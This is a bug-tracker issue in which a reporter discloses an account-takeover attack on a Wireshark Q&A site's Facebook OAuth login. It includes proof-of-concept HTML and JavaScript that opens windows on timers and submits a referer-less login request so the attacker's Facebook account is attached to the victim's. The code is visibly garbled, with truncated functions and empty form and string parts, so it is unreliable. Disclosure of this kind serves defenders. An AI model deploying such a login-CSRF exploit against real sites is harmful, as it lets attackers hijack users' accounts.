[OSQA-954] Account takeover using facebook OAuth #503

javierder opened this Issue May 13, 2015 · 0 comments


[reporter="d3xt0r", created="Thu, 28 Aug 2014 08:41:28 -0400"]
Hey!!

It's me, Daksh Patel, here! I would like to report an account takeover using Facebook OAuth. I tested this on Wireshark (https://ask.wireshark.org/account/signin/).

Steps to reproduce:

1. First allow any app to your Facebook account, like I tested on Wireshark.

2. Now open your account and use these files. Open this test.html file and it'll call the fb_login.html file and bang!! This'll add the attacker's Facebook account to the victim.

Save the test.html and fb_login.html.

I) test.html contains the auth link to Facebook. First open this file:


    <script type="text/javascript">
    function fb_login() {
        return (window.open("./fb_login.html", "_blank",
    function hi_addlogin() {

    function pwn() {
        win1 = fb_login();
        setTimeout("hi_addlogin()", 7000);
        win2 = agree();
        setTimeout("fb_login()", 7000);
    action="https://ask.wireshark.org/account/facebook/signin/" method="GET">

II) The fb_login file contains the Facebook login. Change the email and password in this file.

    <script type="text/javascript">
    function post_without_referer() {
        // POST request, WebKit & Firefox. Data, meta & form submit trinity
        location = 'data:text/html,https://www.facebook.com/login.php?login_attempt=1\'>' +
                   '' +
                   '' +
                   '' +

    // change the email and password.

    // to get victim logged in attacker's account

Lemme know if you need any help.

Daksh Patel